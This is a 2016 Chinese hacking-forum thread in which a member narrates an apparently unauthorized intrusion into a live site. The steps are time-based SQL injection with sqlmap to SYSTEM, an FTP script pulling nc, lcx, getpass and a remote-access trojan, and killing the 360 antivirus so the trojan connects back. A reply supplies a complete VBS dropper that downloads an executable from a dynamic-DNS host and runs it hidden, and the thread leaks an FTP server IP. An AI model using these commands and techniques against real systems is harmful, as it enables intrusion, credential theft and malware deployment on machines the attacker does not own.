[【通过】] 【已转正】一次艰难的渗透案例

[复制链接]
Xiaoye10 发表于 2016-8-16 12:52:26 | 显示全部楼层 |阅读模式

正式成员|主题 |帖子 |积分 149

前言:
     想转正已久,苦于没有 可以上手的文章.  一次小的渗透案例,望通过
0x01  信息收集
小访问一下
0.png

随意加个不存在的页面,看报错,支持aspx

1.png
找个url测试看看 ,aspx 估计是mssql
2.png
and 1=1 报错, 没有安全软件拦截,判断没有安全狗等等防护软件
6.png
猜了几个后台,无果 iis
6a.png
layer 查子域
3.png
ping 检测    根据子域信息,应该没有cdn
t.png
微步在线,查 历史解析,whois
8.png
9.png

nmap 扫端口
7.png
逐一访问
91.png
--
92.png
访问1011 端口,跳转到管理页面
在主战,找到一些可疑连接
9k.png
访问得到一些内网信息
9l.png
信息收集总结:
还有的连接需要http 401 验证

访问1001端口时,自动跳转管理页面
不同端口上开发着不同的web容器.(web应用)
iis nginx romcat apache
支持 php aspx asp jsp
域名注册人邮箱
有hfs 等等服务
判断 突破口很多,服务器安全做的不算好
结合一些信息 去findmi上查找泄露的密码
这里就不截图了
之后进行 弱口令一波,未果
手动对一些url 进行测试 是否存在注入,这里也不截图,因为好几个端口都有web服务.量很大
0x02 利用漏洞扫描工具扫描
awvs
11.png
有延时注入
11a.png
--

11b.png
手动验证一下 ,存在延时注入


0x03 漏洞利用


上sqlmap
11c.png
--current-user
11d.png
sa权限

直接osshell
11e.png
system权限
执行
ipconfig
netstat -nao  
查看是内网,未开发80服务, 端口情况和nmap扫描不符合
判断站库分离
图片忘记截了

因为是站库分离,直接写shell是不行了
我尝试直接写远控到c盘,再os-shell执行
未果
----------
陷入瓶颈后,找基友帮忙,
突破口 ftp
利用ftp 远程下载文件
2003 没有powershell 所以pass

先收集一下信息, 重定向到一个txt文件
因为如果直接回显,太慢了
11f.png

解决ftp 交互式问题,
先建立一个文件,写入
open  ftp服务器地址
user
pass
prompt   开启静默模式
get 360.exe
get nc.exe
get lcx.exe
get getpass.exe
put xy.txt
quit
具体看图
11j.png
之后 ftp -s:文件   执行
回到ftp,在ftp上看到xy.txt ,说明思路成功
11k.png
直接os-shell执行远控,未果
下载xy.txt 文件 ,
11l.png
12.png
看到有360 ,果断
taskkill /F /IM PID 结束360
之后再执行
t2.png
成功上线

内网渗透并怎么会,
web服务器现在正在努力测试,以期望拿下

--------------------------------------------end
总结:
基础和思路 很重要

ps: 望通过
=============================
超过十位正式成员同意,转正成功。
               管理05











单选投票, 共有 41 人参与投票
90.24% (37)
9.76% (4)
您所在的用户组没有投票权限

评分

参与人数 1酒票 +5 收起 理由
管理05 + 5 欢迎加入90!

查看全部评分

Jumbo 发表于 2016-8-16 13:05:12 | 显示全部楼层

正式成员|主题 |帖子 |积分 228

顶一个,ftp、vbs都可以,这竟然能kill掉
80uncle 发表于 2016-8-16 13:45:11 | 显示全部楼层

九零元老|主题 |帖子 |积分 62

ftp 116.255.152.118
泄漏了,虽然里面并没什么东西

Luan 发表于 2016-8-16 13:51:46 | 显示全部楼层

正式成员|主题 |帖子 |积分 47

SA注入点站库分离,ftp传木马执行,这并不艰难吧
 楼主 Xiaoye10 发表于 2016-8-16 16:03:31 | 显示全部楼层

正式成员|主题 |帖子 |积分 149

T0P丶乱 发表于 2016-8-16 13:51
SA注入点站库分离,ftp传木马执行,这并不艰难吧

小白, 并没有想到这个思路,之前因为ftp 是交互式,所以不在考虑.后来有朋友指点了一下.
 楼主 Xiaoye10 发表于 2016-8-16 16:06:35 | 显示全部楼层

正式成员|主题 |帖子 |积分 149

Jumbo 发表于 2016-8-16 13:05
顶一个,ftp、vbs都可以,这竟然能kill掉

瞎猫碰见死耗子.
vbs 实在是不会.根本没往那方面想
ftp之前是由想过,只不过想到ftp是交互式所以放弃,之后朋友指点了一下,才会.


Luan 发表于 2016-8-16 17:46:20 | 显示全部楼层

正式成员|主题 |帖子 |积分 47

Xiaoye10 发表于 2016-8-16 16:06
瞎猫碰见死耗子.
vbs 实在是不会.根本没往那方面想
ftp之前是由想过,只不过想到ftp是交互式所以放弃,之 ...

[Bash shell] 纯文本查看 复制代码
echo Set xPost = CreateObject("Microsoft.XMLHTTP") > D:\sb.vbs
echo xPost.Open "GET","http://***.f3322.org/360.exe",0 >> D:\sb.vbs
echo xPost.Send() >> D:\sb.vbs
echo Set sGet = CreateObject("ADODB.Stream") >> D:\sb.vbs
echo sGet.Mode = 3  >> D:\sb.vbs
echo sGet.Type = 1  >> D:\sb.vbs
echo sGet.Open() >> D:\sb.vbs
echo sGet.Write(xPost.responseBody) >> D:\sb.vbs
echo sGet.SaveToFile "a.exe",2 >> D:\sb.vbs
echo set ws=wscript.createobject("wscript.shell") >> D:\sb.vbs
echo ws.run "a.exe /start",0  >> D:\sb.vbs
cscript "D:\sb.vbs"

评分

参与人数 1酒票 +1 收起 理由
接地气 + 1 乐于助人

查看全部评分

 楼主 Xiaoye10 发表于 2016-8-16 18:25:11 | 显示全部楼层

正式成员|主题 |帖子 |积分 149

T0P丶乱 发表于 2016-8-16 17:46
[mw_shl_code=bash,true]echo Set xPost = CreateObject("Microsoft.XMLHTTP") > D:\sb.vbs
echo xPost. ...

谢谢指点
 楼主 Xiaoye10 发表于 2016-8-16 18:27:00 | 显示全部楼层

正式成员|主题 |帖子 |积分 149

80uncle 发表于 2016-8-16 13:45
ftp 116.255.152.118
泄漏了,虽然里面并没什么东西

发完贴,看了一下,知道泄露了,所以上去删了东西.
幸好这个ftpuser只是一个普通user

mtjbyddzqfwdyy 发表于 2016-8-16 19:28:19 | 显示全部楼层

正式成员|主题 |帖子 |积分 195

延时注入的具体利用,如果能详细写出就太好了。
 楼主 Xiaoye10 发表于 2016-8-16 19:50:17 | 显示全部楼层

正式成员|主题 |帖子 |积分 149

mtjbyddzqfwdyy 发表于 2016-8-16 19:28
延时注入的具体利用,如果能详细写出就太好了。

原谅我现阶段技术不够,延时注入还是mssql 实在是玩不来.当然以后肯定会玩的来的..


roisatm 发表于 2016-8-16 20:06:06 | 显示全部楼层

正式成员|主题 |帖子 |积分 46

权限居然那么大,遇到这种情况我一般都是先 传一个nc进去,然后弹一个shell出来,再慢慢分析。。。
Xlazy 发表于 2016-8-16 22:51:25 | 显示全部楼层

正式成员|主题 |帖子 |积分 211

新人,努力学习前辈经验。加油加油。
芙蓉王 发表于 2016-8-16 22:56:02 | 显示全部楼层

正式成员|主题 |帖子 |积分 201

ftp下载这个方法我只在本地实现过一次

360现在可以结束掉进程了么?
lwx_loveyou 发表于 2016-8-17 11:47:16 | 显示全部楼层

正式成员|主题 |帖子 |积分 7

cmd命令能结束360进程?
xfz 发表于 2016-8-17 15:16:38 | 显示全部楼层

正式成员|主题 |帖子 |积分 31

kill 确定能杀死?
 楼主 Xiaoye10 发表于 2016-8-17 15:40:00 | 显示全部楼层

正式成员|主题 |帖子 |积分 149

本帖最后由 Xiaoye10 于 2016-8-17 15:43 编辑
xfz 发表于 2016-8-17 15:16
kill 确定能杀死?

能,用远控试过了,虽然过一会还会启动起来. A.png

B.png

具体原因可能是版本比较久,等等
 楼主 Xiaoye10 发表于 2016-8-17 15:41:02 | 显示全部楼层

正式成员|主题 |帖子 |积分 149

lwx_loveyou 发表于 2016-8-17 11:47
cmd命令能结束360进程?

能,用远控试过了,可能是因为,版本老问题,还是什么,不清楚
javexj 发表于 2016-8-17 16:37:59 | 显示全部楼层

正式成员|主题 |帖子 |积分 212

站库分离,岂不是拿的数据库服务器?
80uncle 发表于 2016-8-17 21:39:00 | 显示全部楼层

九零元老|主题 |帖子 |积分 62

Xiaoye10 发表于 2016-8-17 15:41
能,用远控试过了,可能是因为,版本老问题,还是什么,不清楚

windows 2003 以下的服务器可以直接taskkill 360的各种进程,2008以上就不行了 ,这个主要跟系统有关,我记得之前360有发布文章说为什么2003可以结束它的进程。
 楼主 Xiaoye10 发表于 2016-8-17 21:53:18 | 显示全部楼层

正式成员|主题 |帖子 |积分 149

taskiller 发表于 2016-8-16 22:51
新人,努力学习前辈经验。加油加油。

会的,前辈
 楼主 Xiaoye10 发表于 2016-8-17 21:53:51 | 显示全部楼层

正式成员|主题 |帖子 |积分 149

80uncle 发表于 2016-8-17 21:39
windows 2003 以下的服务器可以直接taskkill 360的各种进程,2008以上就不行了 ,这个主要跟系统有关,我 ...

感谢指导
冷bing 发表于 2016-8-20 18:31:23 | 显示全部楼层

正式成员|主题 |帖子 |积分 80

不错不错
kidsec 发表于 2016-8-22 18:35:17 | 显示全部楼层

正式成员|主题 |帖子 |积分 9

看完感觉人品忒好了,直接就是system,反弹shell,然后你懂得,嘿咻嘿咻
Xlazy 发表于 2016-9-5 00:25:06 | 显示全部楼层

正式成员|主题 |帖子 |积分 211



我是新人。您是前辈。
快速回复 返回顶部 返回列表